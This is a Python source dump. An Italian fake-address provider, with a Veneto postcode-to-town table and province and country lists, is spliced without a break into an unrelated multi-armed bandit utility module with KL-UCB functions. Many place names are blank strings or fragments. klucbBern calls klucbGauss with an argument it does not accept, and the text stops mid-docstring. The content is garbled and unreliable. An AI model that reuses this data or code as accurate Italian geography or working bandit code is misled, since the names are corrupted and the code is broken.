"TV"]], "31052": [["Varago", "TV"], ["", "TV"], ["Candelu'", "TV"]], "31053": [["", "TV"], ["Barbisano", "TV"], ["Solighetto", "TV"]], "31054": [["Possagno", "TV"]], "31055": [["", "TV"], ["Santa Cristina", "TV"]], "31056": [["Musestre", "TV"], ["San Cipriano", "TV"], ["Roncade", "TV"], ["Biancade", "TV"]], "31057": [["Cendon", "TV"], ["Silea", "TV"], ["Sant'Elena", "TV"]], "31058": [["Susegana", "TV"]], "31059": [["Scandolara", "TV"], ["Zero Branco", "TV"], ["Sant'Alberto", "TV"]], "31100": [ ["Treviso", "TV"], ["Fiera", "TV"], ["", "TV"], ["Monigo", "TV"], ["", "TV"], ["Canizzano", "TV"], ], "30010": [ ["Lughetto", "VE"], ["", "VE"], ["Cona", "VE"], ["", "VE"], ["Lova", "VE"], ["Pegolotte", "VE"], ["Cantarana", "VE"], ["Camponogara", "VE"], ["Liettoli", "VE"], ["Bojon", "VE"], ], "30013": [ ["", "VE"], ["", "VE"], ["Cavallino", "VE"], ["Treporti", "VE"], ["", "VE"], ["", "VE"], ], "30014": [ ["Rottanova", "VE"], ["", "VE"], ["Cavarzere", "VE"], ["", "VE"], ["Boscochiaro", "VE"], ["", "VE"], ["", "VE"], ], "30015": [ ["Valli", "VE"], ["Sant'Anna", "VE"], ["", "VE"], ["Sottomarina", "VE"], ["Chioggia", "VE"], ["", "VE"], ["", "VE"], ], "30016": [["Iesolo", "VE"], ["", "VE"]], "30020": [ ["", "VE"], ["", "VE"], ["Giai", "VE"], ["", "VE"], ["Stretti", "VE"], ["Pramaggiore", "VE"], ["", "VE"], ["Portegrandi", "VE"], ["Belfiore", "VE"], ["Marcon", "VE"], ["", "VE"], ["Meolo", "VE"], ["", "VE"], ["Loncon", "VE"], ["", "VE"], ["", "VE"], ["", "VE"], ["", "VE"], ["Gruaro", "VE"], ["Gaggio", "VE"], ["", "VE"], ["", "VE"], ["Bagnara", "VE"], ["Eraclea", "VE"], ["", "VE"], ], "30021": [ ["", "VE"], ["", "VE"], ["", "VE"], ["Caorle", "VE"], ["a", "VE"], ], "30022": [["Ceggia", "VE"]], "30023": [["", "VE"], ["Sindacale", "VE"]], "30024": [["Croce", "VE"], ["", "VE"]], "30025": [ ["Cintello", "VE"], ["", "VE"], ["", "VE"], ["Fratta", "VE"], ["", "VE"], ], "30026": [["Lugugnana", "VE"], ["Summaga", "VE"], ["Pradipozzo", "VE"], ["Portogruaro", "VE"]], "30027": [["Passarella", "VE"], ["Calvecchia", 
"VE"], ["", "VE"]], "30028": [ ["Bibione", "VE"], ["Cesarolo", "VE"], ["", "VE"], ["", "VE"], ["Pozzi San ", "VE"], [" Al Tagliamento", "VE"], ["Pozzi", "VE"], ], "30029": [["", "VE"], ["Corbolone", "VE"], ["", "VE"]], "30030": [ ["Fosso'", "VE"], ["Martellago", "VE"], ["Sandon", "VE"], ["Maerne", "VE"], ["", "VE"], ["Galta", "VE"], ["Salzano", "VE"], ["Olmo", "VE"], ["Tombelle", "VE"], ["Pianiga", "VE"], ["", "VE"], ["Robegano", "VE"], ["Vigonovo", "VE"], ["Cazzago", "VE"], ], "30031": [["Arino", "VE"], ["Sambruson", "VE"], ["Dolo", "VE"]], "30032": [["", "VE"]], "30033": [["Moniego", "VE"], ["Cappelletta", "VE"], ["", "VE"], ["Noale", "VE"]], "30034": [ ["Gambarare", "VE"], ["Marano", "VE"], ["", "VE"], ["", "VE"], ["Oriago", "VE"], ["Borbiago", "VE"], ["", "VE"], ["Mira", "VE"], ], "30035": [["Ballo'", "VE"], ["Zianigo", "VE"], ["Mirano", "VE"], ["Vetrego", "VE"], ["Scaltenigo", "VE"]], "30036": [ ["Caltana", "VE"], ["", "VE"], ["Veternigo", "VE"], ["Stigliano", "VE"], ["Sant'Angelo", "VE"], ], "30037": [["Peseggia", "VE"], ["Scorze'", "VE"], ["", "VE"]], "30038": [["Fornase", "VE"], ["Orgnano", "VE"], ["Spinea", "VE"]], "30039": [[" Di Stra'", "VE"], ["Stra", "VE"], ["Paluello", "VE"]], "30100": [["Venezia", "VE"]], "30121": [["Venezia", "VE"], ["Cannaregio", "VE"]], "30122": [["Sant'Elena", "VE"], ["Venezia", "VE"], ["Castello", "VE"]], "30123": [["Venezia", "VE"], ["Dorsoduro", "VE"]], "30124": [["Venezia", "VE"], ["", "VE"]], "30125": [["", "VE"], ["Venezia", "VE"]], "30126": [ ["Venezia", "VE"], ["Malamocco", "VE"], ["Lido", "VE"], ["Alberoni", "VE"], ["Portosecco", "VE"], ["San Pietro In Volta", "VE"], ["Vianelli", "VE"], ["Zennari", "VE"], ["Scarpa", "VE"], ["", "VE"], ["Busetti", "VE"], ], "30131": [["Venezia", "VE"]], "30132": [["Venezia", "VE"], ["Sant'Elena", "VE"]], "30133": [["", "VE"], ["Venezia", "VE"], ["Giudecca", "VE"]], "30135": [["", "VE"], ["Venezia", "VE"]], "30141": [["Venezia", "VE"], ["Murano", "VE"]], "30142": [ ["Mazzorbo", "VE"], ["", "VE"], ["Burano", "VE"], ["", "VE"], ["", "VE"], ["Terranova", "VE"], ["", "VE"], ], "30170": [["", "VE"]], "30171": [["Mestre", "VE"]], "30172": [["Mestre", "VE"]], "30173": [["Campalto", "VE"], ["Mestre", "VE"], ["Venezia", "VE"], ["", "VE"]], "30174": [["Zelarino", "VE"], ["Gazzera", "VE"], ["Mestre", "VE"]], "30175": [["Mestre", "VE"], ["", "VE"], ["Carpenedo", "VE"], ["Marghera", "VE"]], "36010": [ ["Camporovere", "VI"], ["Chiuppano", "VI"], ["", "VI"], ["", "VI"], ["Cavazzale", "VI"], ["Laghi", "VI"], ["Cesuna", "VI"], ["Velo", "VI"], ["Roana", "VI"], ["Carre'", "VI"], ["", "VI"], ["", "VI"], ["", "VI"], ["", "VI"], ["Rotzo", "VI"], ["Seghe", "VI"], ["Foza", "VI"], ["Vigardolo", "VI"], ["Zane'", "VI"], ["Posina", "VI"], ["", "VI"], ], "36011": [["Arsiero", "VI"], ["Castana", "VI"]], "36012": [["Rigoni", "VI"], ["Rodeghieri", "VI"], ["Asiago", "VI"], ["Sasso", "VI"]], "36013": [["", "VI"]], "36014": [["Santorso", "VI"]], "36015": [ ["'", "VI"], ["Giavenale", "VI"], ["", "VI"], ["", "VI"], ["Schio", "VI"], ["Tretto", "VI"], ["Sant'Ulderico", "VI"], ], "36016": [["Thiene", "VI"], ["Rozzampia", "VI"]], "36020": [ ["Zovencedo", "VI"], ["", "VI"], ["Solagna", "VI"], ["Albettone", "VI"], ["", "VI"], ["Agugliaro", "VI"], ["", "VI"], ["Villaganzerla", "VI"], ["Primolano", "VI"], ["", "VI"], ["", "VI"], ["Castegnero", "VI"], ["Carpane'", "VI"], ], "36021": [["Villaga", "VI"], ["", "VI"], ["", "VI"]], "36022": [["", "VI"], ["", "VI"], ["", "VI"], ["Cassola", "VI"]], "36023": [["Longare", "VI"], ["Lumignano", "VI"], ["Bugano", "VI"]], 
"36024": [["Mossano", "VI"], ["Nanto", "VI"], ["", "VI"]], "36025": [["", "VI"]], "36026": [["Cagnano", "VI"], ["", "VI"]], "36027": [["Rosa'", "VI"]], "36028": [["", "VI"]], "36029": [ ["", "VI"], ["Valstagna", "VI"], ["", "VI"], ["", "VI"], ], "36030": [ ["", "VI"], ["Cresole", "VI"], ["Sarcedo", "VI"], ["", "VI"], ["Novoledo", "VI"], ["Zugliano", "VI"], ["", "VI"], ["Priabona", "VI"], ["Sant'Antonio", "VI"], ["", "VI"], ["Villaverla", "VI"], ["Caltrano", "VI"], ["Staro", "VI"], ["Calvene", "VI"], ["", "VI"], ["", "VI"], ["Rettorgole", "VI"], ["", "VI"], ["", "VI"], ["Motta", "VI"], ["", "VI"], ["Costabissara", "VI"], ["Leva'", "VI"], ["Preara", "VI"], ["", "VI"], ["Centrale", "VI"], ["Caldogno", "VI"], ], "36031": [["Dueville", "VI"], ["Povolaro", "VI"]], "36032": [["Gallio", "VI"]], "36033": [["", "VI"], ["Castelnovo", "VI"]], "36034": [["Malo", "VI"], ["", "VI"]], "36035": [["", "VI"]], "36036": [["Torrebelvicino", "VI"], ["Pievebelvicino", "VI"]], "36040": [ ["Orgiano", "VI"], ["Lastebasse", "VI"], ["Pedescala", "VI"], ["", "VI"], ["Valdastico", "VI"], ["Casotto", "VI"], ["Lerino", "VI"], ["Pedemonte", "VI"], ["Brendola", "VI"], ["Pederiva", "VI"], ["", "VI"], ["Marola", "VI"], ["Sossano", "VI"], ["Laverda", "VI"], ["Sarego", "VI"], ["Grancona", "VI"], ["", "VI"], ["Salcedo", "VI"], ["", "VI"], ["Vo'", "VI"], ["", "VI"], ["", "VI"], ["Meledo", "VI"], ["", "VI"], ["Barcarola", "VI"], ["", "VI"], ], "36042": [["Mirabella", "VI"], ["Maragnole", "VI"], ["Breganze", "VI"]], "36043": [["", "VI"]], "36045": [ ["Lonigo", "VI"], ["", "VI"], ["Bagnolo", "VI"], ["Almisano", "VI"], ["Alonte", "VI"], ], "36046": [["Santa Caterina", "VI"], ["Conco", "VI"], ["Lusiana", "VI"]], "36047": [["Montegalda", "VI"], ["Montegaldella", "VI"]], "36050": [ ["", "VI"], ["Monteviale", "VI"], ["Friola", "VI"], ["", "VI"], ["Pozzoleone", "VI"], ["Lanze'", "VI"], ["Bressanvido", "VI"], ["Zermeghedo", "VI"], ["Poianella", "VI"], ["Sovizzo", "VI"], ["Cartigliano", "VI"], ["Ospedaletto", "VI"], ["", "VI"], ["", "VI"], ["Lisiera", "VI"], ["Gambugliano", "VI"], ], "36051": [["Olmo", "VI"], ["Creazzo", "VI"]], "36052": [["Enego", "VI"], ["Stoner", "VI"]], "36053": [["Gambellara", "VI"]], "36054": [["", "VI"]], "36055": [["Nove", "VI"]], "36056": [["", "VI"], ["Belvedere", "VI"]], "36057": [ ["Tormeno", "VI"], ["Arcugnano", "VI"], ["", "VI"], ["Nogarazza", "VI"], ["", "VI"], ], "36060": [ ["", "VI"], ["Fellette", "VI"], ["", "VI"], ["", "VI"], ["Spin", "VI"], ["Pianezze", "VI"], ["Longa", "VI"], ["Schiavon", "VI"], ], "36061": [["Valrovina", "VI"], ["", "VI"], ["Campese", "VI"]], "36062": [["Fontanelle", "VI"]], "36063": [["", "VI"], ["Marostica", "VI"], ["Vallonara", "VI"], ["Crosara", "VI"]], "36064": [["Molvena", "VI"], ["", "VI"], ["Villaraspa", "VI"]], "36065": [["Mussolente", "VI"], ["Casoni", "VI"]], "36066": [["Sandrigo", "VI"]], "36070": [ ["", "VI"], ["Altissimo", "VI"], ["Molino", "VI"], ["Brogliano", "VI"], ["Lovara", "VI"], ["Ferrazza", "VI"], ["Trissino", "VI"], ["", "VI"], ["", "VI"], ["Crespadoro", "VI"], ["", "VI"], ["Castelgomberto", "VI"], ], "36071": [["Pugnello", "VI"], ["Arzignano", "VI"], ["Tezze", "VI"]], "36072": [["Chiampo", "VI"]], "36073": [["Cereda", "VI"], ["", "VI"]], "36075": [ ["", "VI"], ["", "VI"], ["", "VI"], ["Sant'Urbano", "VI"], ], "36076": [["Rovegliana", "VI"], ["", "VI"]], "36077": [["Valmarana", "VI"], ["", "VI"], ["", "VI"]], "36078": [ ["", "VI"], ["Novale", "VI"], ["Castelvecchio", "VI"], ["Valdagno", "VI"], ["Piana", "VI"], ["", "VI"], ], "36100": [ ["Vicenza", "VI"], 
["Setteca'", "VI"], ["Anconetta", "VI"], ["Longara", "VI"], ["Polegge", "VI"], ["Campedello", "VI"], ], "37010": [ ["Brenzone", "VR"], ["", "VR"], ["Albare'", "VR"], ["", "VR"], ["Costermano", "VR"], ["Magugnano", "VR"], ["", "VR"], ["Piovezzano", "VR"], ["", "VR"], ["", "VR"], ["Sega", "VR"], ["", "VR"], ["Affi", "VR"], ["", "VR"], ["", "VR"], ["onese", "VR"], ["Pastrengo", "VR"], ], "37011": [["Cisano", "VR"], ["Calmasino", "VR"], ["Bardolino", "VR"]], "37012": [["Bussolengo", "VR"], ["San Vito Al Mantico", "VR"]], "37013": [["Pesina", "VR"], ["Spiazzi", "VR"], ["", "VR"], ["Boi", "VR"]], "37014": [["Oliosi", "VR"], ["", "VR"], ["Sandra'", "VR"], ["Cavalcaselle", "VR"]], "37015": [["Gargagnago", "VR"], ["Domegliara", "VR"], ["Monte", "VR"], ["", "VR"]], "37016": [["Garda", "VR"]], "37017": [["Lazise", "VR"], ["", "VR"], ["Cola'", "VR"], ["Pacengo", "VR"]], "37018": [["Cassone", "VR"], ["Malcesine", "VR"]], "37019": [["", "VR"], ["", "VR"]], "37020": [ ["Rivalta", "VR"], ["Valgatara", "VR"], ["", "VR"], ["", "VR"], ["Peri", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["Cerna", "VR"], ["", "VR"], ["Prun", "VR"], ["Fosse", "VR"], ["Fane", "VR"], ["Erbezzo", "VR"], ["Dolce'", "VR"], ["Volargne", "VR"], ], "37021": [["", "VR"], ["Corbiolo", "VR"], ["Lughezzano", "VR"]], "37022": [["Fumane", "VR"], ["Cavalo", "VR"], ["Breonio", "VR"]], "37023": [ ["Stallavena", "VR"], ["Romagnano", "VR"], ["Azzago", "VR"], ["Grezzana", "VR"], ["", "VR"], ], "37024": [ ["Negrar", "VR"], ["", "VR"], ["", "VR"], ["Arbizzano", "VR"], ], "37026": [["Ospedaletto", "VR"], ["Pescantina", "VR"], ["Settimo", "VR"]], "37028": [["Rovere' Veronese", "VR"]], "37029": [ ["Pedemonte", "VR"], ["", "VR"], ["Negarine", "VR"], ["", "VR"], ["Corrubbio", "VR"], ["Bure", "VR"], ], "37030": [ ["Vestenanova", "VR"], ["Lavagno", "VR"], ["", "VR"], ["Vago", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["Stra'", "VR"], ["", "VR"], ["Montanara", "VR"], ["Terrossa", "VR"], ["", "VR"], ["", "VR"], ["Ronca'", "VR"], ["", "VR"], ["", "VR"], ["San Pietro", "VR"], ["", "VR"], ], "37031": [["Cellore", "VR"], ["Illasi", "VR"]], "37032": [["", "VR"], ["Brognoligo", "VR"], ["Costalunga", "VR"]], "37035": [["", "VR"]], "37036": [["Ferrazze", "VR"], ["Marcellise", "VR"], ["", "VR"], ["Mambrotta", "VR"]], "37038": [["Soave", "VR"], ["Castelletto", "VR"]], "37039": [["Tregnago", "VR"], ["Cogollo", "VR"], ["Centro", "VR"]], "37040": [ ["Arcole", "VR"], ["Caselle", "VR"], ["Marega", "VR"], ["Begosso", "VR"], ["Zimella", "VR"], ["Bevilacqua", "VR"], ["Terrazzo", "VR"], ["Bonavigo", "VR"], ["'", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["Sabbion", "VR"], ["Veronella", "VR"], ["Pressana", "VR"], ["", "VR"], ["", "VR"], ["Gazzolo", "VR"], ["Orti", "VR"], ], "37041": [["Presina", "VR"], ["", "VR"], ["Michellorie", "VR"], ["", "VR"]], "37042": [["Caldiero", "VR"], ["Caldierino", "VR"]], "37043": [["Castagnaro", "VR"], ["Mena'", "VR"], ["", "VR"]], "37044": [["", "VR"], ["", "VR"], ["Sule'", "VR"], ["Baldaria", "VR"]], "37045": [ ["", "VR"], ["Casette", "VR"], ["Gallese", "VR"], ["Legnago", "VR"], ["Vangadizza", "VR"], ["Terranegra", "VR"], ], "37046": [["Minerbe", "VR"]], "37047": [["Locara", "VR"], ["", "VR"], ["Prova", "VR"], ["Villabella", "VR"]], "37049": [["Spinimbecco", "VR"], ["", "VR"], ["", "VR"]], "37050": [ ["Belfiore", "VR"], ["Concamarise", "VR"], ["Bonavicina", "VR"], ["Vallese", "VR"], ["", "VR"], ["Roverchiaretta", "VR"], ["Piazza", "VR"], ["Roverchiara", "VR"], ["", "VR"], ["", "VR"], ["Angiari", "VR"], ["Oppeano", 
"VR"], ["Palu'", "VR"], ], "37051": [["Bovolone", "VR"], ["Villafontana", "VR"]], "37052": [["Casaleone", "VR"]], "37053": [["Cherubine", "VR"], ["Asparetto", "VR"], ["Cerea", "VR"]], "37054": [["Nogara", "VR"]], "37055": [["Tombazosana", "VR"], ["Albaro", "VR"], ["", "VR"]], "37056": [["Crosarol", "VR"], ["Valmorsel", "VR"], ["Salizzole", "VR"], ["Bionde", "VR"], ["Engazza'", "VR"]], "37057": [["Raldon", "VR"], ["", "VR"], ["", "VR"]], "37058": [["Sanguinetto", "VR"]], "37059": [ ["Zevio", "VR"], ["Campagnola", "VR"], ["Perzacco", "VR"], ["Volon", "VR"], ["", "VR"], ], "37060": [ ["Maccacari", "VR"], ["Pradelle", "VR"], ["", "VR"], ["Pontepossero", "VR"], ["Bovo", "VR"], ["Correzzo", "VR"], ["Azzano", "VR"], ["Roncanova", "VR"], ["Buttapietra", "VR"], ["Bagnolo", "VR"], ["Palazzolo", "VR"], ["Bonferraro", "VR"], ["Sorga'", "VR"], ["", "VR"], ["Erbe'", "VR"], ["Sona", "VR"], ["Marchesino", "VR"], ["Beccacivetta", "VR"], ["Roncoleva'", "VR"], ["Trevenzuolo", "VR"], ["", "VR"], ["Mozzecane", "VR"], ["", "VR"], ["Lugagnano", "VR"], ["", "VR"], ], "37062": [["Dossobuono", "VR"], ["Alpo", "VR"]], "37063": [["Pellegrina", "VR"], ["Tarmassia", "VR"], ["", "VR"]], "37064": [["", "VR"]], "37066": [["Custoza", "VR"], ["Sommacampagna", "VR"], ["", "VR"]], "37067": [["Salionze", "VR"], ["", "VR"]], "37068": [["Forette", "VR"], ["Vigasio", "VR"], ["Isolalta", "VR"]], "37069": [ ["Pizzoletta", "VR"], ["", "VR"], ["Caluri", "VR"], ["Quaderni", "VR"], ["Rosegaferro", "VR"], ], "37100": [["Verona", "VR"]], "37121": [["Verona", "VR"]], "37122": [["Verona", "VR"]], "37123": [["Verona", "VR"]], "37124": [["Verona", "VR"]], "37125": [["Quinzano", "VR"], ["Verona", "VR"]], "37126": [["Verona", "VR"]], "37127": [["Verona", "VR"], ["Avesa", "VR"]], "37128": [["Verona", "VR"]], "37129": [["Verona", "VR"]], "37131": [["Verona", "VR"]], "37132": [["Verona", "VR"], ["San Michele Extra", "VR"]], "37133": [["Verona", "VR"]], "37134": [["Verona", "VR"]], "37135": [["Verona", "VR"]], "37136": [["Verona", "VR"]], "37137": [["Verona", "VR"]], "37138": [["Verona", "VR"]], "37139": [["San Mass'Adige", "VR"], ["Verona", "VR"], ["Chievo", "VR"]], "37142": [["Verona", "VR"]], } city_prefixes = ("San", "Borgo", "Sesto", "Quarto", "Settimo") city_suffixes = ( "a mare", "lido", "ligure", "del friuli", "salentino", "calabro", "veneto", "nell'emilia", "umbro", "laziale", "terme", "sardo", ) building_number_formats = ("@@#",) street_suffixes = ( "Piazza", "Strada", "Via", "Borgo", "Contrada", "Rotonda", "Incrocio", "Viale", "Stretto", "Vicolo", "Canale", ) postcode_formats = cap_city_province.keys() cities = getcities(cap_city_province) states = ( "Agrigento", "Alessandria", "Ancona", "Aosta", "Arezzo", "", "Asti", "Avellino", "Bari", "Barletta-Andria-Trani", "Belluno", "Benevento", "Bergamo", "Biella", "Bologna", "Bolzano", "Brescia", "Brindisi", "Cagliari", "Caltanissetta", "Campobasso", "Carbonia-Iglesias", "Caserta", "Catania", "Catanzaro", "Chieti", "Como", "Cosenza", "Cremona", "Crotone", "Cuneo", "Enna", "Fermo", "Ferrara", "Firenze", "Foggia", "Forlì-Cesena", "Frosinone", "Genova", "Gorizia", "Grosseto", "Imperia", "Isernia", "La Spezia", "L'Aquila", "Latina", "Lecce", "Lecco", "Livorno", "Lodi", "Lucca", "Macerata", "Mantova", "Massa-Carrara", "Matera", "Messina", "Milano", "Modena", "", "Napoli", "Novara", "Nuoro", "Olbia-Tempio", "Oristano", "Padova", "Palermo", "Parma", "Pavia", "Perugia", " Urbino", "Pescara", "Piacenza", "Pisa", "Pistoia", "Pordenone", "Potenza", "Prato", "Ragusa", "Ravenna", "", "", "Rieti", "Rimini", 
"Roma", "Rovigo", "Salerno", "", "Sassari", "Savona", "Siena", "Siracusa", "Sondrio", "Taranto", "Teramo", "Terni", "Torino", "Ogliastra", "Trapani", "Trento", "Treviso", "Trieste", "Udine", "Varese", "Venezia", "Verbano-Cusio-Ossola", "Vercelli", "Verona", "", "Vicenza", "Viterbo", ) states_abbr = ( "AG", "AL", "AN", "AO", "AR", "AP", "AT", "AV", "BA", "BT", "BL", "BN", "BG", "BI", "BO", "BZ", "BS", "BR", "CA", "CL", "CB", "CI", "CE", "CT", "CZ", "CH", "CO", "CS", "CR", "KR", "CN", "EN", "FM", "FE", "FI", "FG", "FC", "FR", "GE", "GO", "GR", "IM", "IS", "SP", "AQ", "LT", "LE", "LC", "LI", "LO", "LU", "MC", "MN", "MS", "MT", "ME", "MI", "MO", "MB", "NA", "NO", "NU", "OT", "OR", "PD", "PA", "PR", "PV", "PG", "PU", "PE", "PC", "PI", "PT", "PN", "PZ", "PO", "RG", "RA", "RC", "RE", "RI", "RN", "RM", "RO", "SA", "VS", "SS", "SV", "SI", "SR", "SO", "TA", "TE", "TR", "TO", "OG", "TP", "TN", "TV", "TS", "UD", "VA", "VE", "VB", "VC", "VR", "VV", "VI", "VT", ) countries = ( "Afghanistan", "Albania", "Algeria", "American Samoa", "Andorra", "Angola", "Anguilla", "Antartide (territori a sud del 60° parallelo)", "Antigua e Barbuda", "Argentina", "Armenia", "Aruba", "Australia", "Austria", "Azerbaijan", "Bahamas", "Bahrain", "Bangladesh", "Barbados", "Bielorussia", "Belgio", "Belize", "Benin", "Bermuda", "Bhutan", "Bolivia", "Bosnia e Herzegovina", "Botswana", "Bouvet Island (Bouvetoya)", "Brasile", "Territorio dell'arcipelago indiano", "Isole Vergin", "", "Bulgaria", "Burkina Faso", "Burundi", "Cambogia", "Cameroon", "Canada", "", "", "Repubblica Centrale Africana", "Chad", "Cile", "Cina", "Isola di Pasqua", "Isola di Cocos (Keeling)", "Colombia", "Comoros", "Congo", "Isole Cook", "", "'Avorio", "Croazia", "Cuba", "Cipro", "Repubblica Ceca", "Danimarca", "Gibuti", "Repubblica Dominicana", "Equador", "Egitto", "El Salvador", "Guinea Equatoriale", "Eritrea", "Estonia", "Etiopia", "I", "Isole Falkland (Malvinas)", "Fiji", "Finlandia", "Francia", "Guyana Francese", "Polinesia Francese", "Territori Francesi del sud", "Gabon", "Gambia", "Georgia", "Germania", "Ghana", "Gibilterra", "Grecia", "Groenlandia", "Grenada", "Guadalupa", "Guam", "Guatemala", "Guernsey", "Guinea", "Guinea-Bissau", "Guyana", "Haiti", "Heard Island and McDonald Islands", "Città del Vaticano", "Honduras", "Hong Kong", "Ungheria", "Islanda", "India", "Indonesia", "Iran", "Iraq", "Irlanda", "Isola di Man", "Israele", "Italia", "Giamaica", "Giappone", "Jersey", "Giordania", "Kazakhstan", "Kenya", "Kiribati", "Korea", "Kuwait", "Republicca Kirgiza", "Repubblica del Laos", "Latvia", "Libano", "Lesotho", "Liberia", "Libyan Arab Jamahiriya", "Liechtenstein", "Lituania", "Lussemburgo", "Macao", "Macedonia", "Madagascar", "Malawi", "Malesia", "Maldive", "Mali", "Malta", "Isole Marshall", "Martinica", "Mauritania", "Mauritius", "Mayotte", "Messico", "Micronesia", "Moldova", "Principato di Monaco", "Mongolia", "Montenegro", "Montserrat", "Marocco", "Mozambico", "Myanmar", "Namibia", "Nauru", "Nepal", "", "Olanda", "Nuova Caledonia", "Nuova Zelanda", "Nicaragua", "Niger", "Nigeria", "Niue", "Isole Norfolk", "Northern Mariana Islands", "Norvegia", "Oman", "Pakistan", "Palau", "Palestina", "Panama", "Papua Nuova Guinea", "Paraguay", "Peru", "Filippine", "Pitcairn Islands", "Polonia", "Portogallo", "Porto Rico", "Qatar", "Reunion", "Romania", "Russia", "Rwanda", "San Bartolomeo", "Sant'Elena", "Saint Kitts and Nevis", "Saint Lucia", "", "Saint Pierre and Miquelon", "Saint Vincent and the Grenadines", "Samoa", "San Marino", "Sao Tome and Principe", 
"Arabia Saudita", "Senegal", "Serbia", "Seychelles", "Sierra Leone", "Singapore", "Slovenia", "Isole Solomon", "Somalia", "Sud Africa", "Georgia del sud e South Sandwich Islands", "Spagna", "Sri Lanka", "Sudan", "Suriname", "Svalbard & Jan Mayen Islands", "Swaziland", "Svezia", "Svizzera", "Siria", "Taiwan", "Tajikistan", "Tanzania", "Tailandia", "Timor-Leste", "Togo", "Tokelau", "Tonga", "Trinidad e Tobago", "Tunisia", "Turchia", "Turkmenistan", "Isole di Turks and Caicos", "Tuvalu", "Uganda", "Ucraina", "Emirati Arabi Uniti", "Regno Unito", "Stati Uniti d'America", "United States Minor Outlying Islands", "Isole Vergini Statunitensi", "Uruguay", "Uzbekistan", "Vanuatu", "Venezuela", "Vietnam", "Wallis and Futuna", "Western Sahara", "Yemen", "Zambia", "Zimbabwe", ) city_formats = ( "{{city_prefix}} {{first_name}} {{city_suffix}}", "{{city_prefix}} {{first_name}}", "{{first_name}} {{city_suffix}}", "{{last_name}} {{city_suffix}}", ) street_name_formats = ( "{{street_suffix}} {{first_name}}", "{{street_suffix}} {{last_name}}", ) street_address_formats = ( "{{street_name}}, {{building_number}}", "{{street_name}}, {{building_number}} {{secondary_address}}", ) address_formats = ("{{street_address}}\n{{postcode_city_province}}",) secondary_address_formats = ("Appartamento @#", "Piano #") def postcode_city_province(self) -> str: cap = self.postcode() rand_city_prov: List[str] = self.random_element(self.cap_city_province[cap]) return cap + ", " + rand_city_prov[0] + " (" + rand_city_prov[1] + ")" def city(self) -> str: return self.random_element(self.cities) def city_prefix(self) -> str: return self.random_element(self.city_prefixes) def secondary_address(self) -> str: return self.numerify(self.random_element(self.secondary_address_formats)) def administrative_unit(self) -> str: return self.random_element(self.states) state = administrative_unit def state_abbr(self) -> str: return self.random_element(self.states_abbr) """ Packages import """ import numpy as np import matplotlib.pyplot as plt from numba import jit import bottleneck as bn import scipy.stats as sc from math import log, sqrt eps = 1e-15 #: Threshold value: everything in [0, 1] is truncated to [eps, 1 - eps] @jit(nopython=True) def rd_argmax(vector): """ Compute random among eligible maximum indices :param vector: np.array :return: int, random index among eligible maximum indices """ m = np.amax(vector) indices = np.nonzero(vector == m)[0] return np.random.choice(indices) @jit(nopython=True) def rd_choice(vec, size): return np.random.choice(vec, size=size, replace=False) @jit(nopython=True) def hypergeom_sample(s1, n1, n2): return np.random.hypergeometric(s1, n1 - s1, nsample=n2) def rollavg_bottlneck(a, n): """ :param a: array :param n: window of the rolling average :return: """ return bn.move_mean(a, window=n, min_count=n) @jit def klBern(x, y): # Function extracted from the SMPBandits package from Lillian Besson https://github.com/SMPyBandits/SMPyBandits/ x = min(max(x, eps), 1 - eps) y = min(max(y, eps), 1 - eps) return x * log(x / y) + (1 - x) * log((1 - x) / (1 - y)) @jit def klucb(x, d, kl, upperbound, precision=1e-6, lowerbound=float('-inf'), max_iterations=50): # Function extracted from the SMPBandits package from Lillian Besson https://github.com/SMPyBandits/SMPyBandits/ r""" The generic KL-UCB index computation. 
- ``x``: value of the cum reward, - ``d``: upper bound on the divergence, - ``kl``: the KL divergence to be used (:func:`klBern`, :func:`klGauss`, etc), - ``upperbound``, ``lowerbound=float('-inf')``: the known bound of the values ``x``, - ``precision=1e-6``: the threshold from where to stop the research, - ``max_iterations=50``: max number of iterations of the loop (safer to bound it to reduce time complexity). """ value = max(x, lowerbound) u = upperbound _count_iteration = 0 while _count_iteration < max_iterations and u - value > precision: _count_iteration += 1 m = (value + u) * 0.5 if kl(x, m) > d: u = m else: value = m return (value + u) * 0.5 @jit def klucbBern(x, d, precision=1e-6): # Function extracted from the SMPBandits package from Lillian Besson https://github.com/SMPyBandits/SMPyBandits/ """ KL-UCB index computation for Bernoulli distributions, using :func:`klucb`. """ upperbound = min(1., klucbGauss(x, d, sig2x=0.25, precision=precision)) # variance 1/4 for [0,1] bounded distributions return klucb(x, d, klBern, upperbound, precision) @jit def klucbGauss(x, d, sig2x=0.25): # Function extracted from the SMPBandits package from Lillian Besson https://github.com/SMPyBandits/SMPyBandits/ """ KL-UCB index computation for Gaussian distributions. """ return x + sqrt(abs(2 * sig2x * d)) @jit(nopython=True) def get_leader(Na, Sa, l_prev): """ :param Na: np.array, number of pull of the different arms :param Sa: np.array, cumulative reward of the different arms :param l_prev: previous leader :return: the arm that has been pulled the most, in case of equality the arm the has the highest cumulative reward among the most pulled arms. If several candidates and the previous leader is among them, return the previous leader. Otherwise random choice among the remaining candidates. """ m = np.amax(Na) n_argmax = np.nonzero(Na == m)[0] if n_argmax.shape[0] == 1: l = n_argmax[0] return l else: s_max = Sa[n_argmax].max() s_argmax = np.nonzero(Sa[n_argmax] == s_max)[0] if np.nonzero(n_argmax[s_argmax] == l_prev)[0].shape[0] > 0: return l_prev return n_argmax[np.random.choice(s_argmax)] @jit(nopython=True) def get_leader_ns(Na, Sa, l_prev, r, tau, K, winners): """ :param Na: np.array, number of pull of the different arms :param Sa: np.array, cumulative reward of the different arms :param l_prev: previous leader :param r: current round :param tau: sliding window length :param K: number of arms :param winners: np.array, contains of 1 at position k if arm k has won its duel against l_prev :return: the arm that has been pulled the most, in case of equality the arm the has the highest cumulative reward among the most pulled arms. If several candidates and the previous leader is among them, return the previous leader. Otherwise random choice among the remaining candidates. 
